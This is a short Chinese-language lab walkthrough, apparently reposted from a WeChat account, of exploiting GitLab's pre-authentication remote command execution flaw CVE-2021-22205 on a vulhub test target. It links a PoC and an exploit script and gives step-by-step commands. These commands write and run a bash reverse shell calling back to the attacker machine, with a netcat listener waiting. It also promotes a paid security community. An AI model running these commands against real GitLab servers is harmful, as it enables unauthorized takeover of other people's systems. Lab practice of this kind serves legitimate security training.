“ CVE-2021-22205”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
CVE-2021-22205
镜像拉取vulhub的靶机,部署好之后,访问:
http://192.168.134.128:8080/users/sign_in
测试POC:
https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/poc.py
python poc.py http://192.168.134.128:8080 "touch /tmp/success"
成功命令执行。下载EXP
https://github.com/Al1ex/CVE-2021-22205/blob/main/CVE-2021-22205.py
检查目标是否存在漏洞:
python CVE-2021-22205.py -v true -t http://192.168.134.128:8080
在攻击机上利用该工具在目标服务器内写入反弹shell脚本:
python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.134.131/6666 0>&1' > /tmp/shell.sh"
写入成功,给权限并执行:
kali:nc -lvnp 6666
python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "chmod +x /tmp/shell.sh"
python CVE-2021-22205.py -a true -t http://192.168.134.128:8080/ -c "/bin/bash /tmp/shell.sh"
原文始发于微信公众号(道玄网安驿站):GitLab 预身份验证远程命令执行 (CVE-2021-22205)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论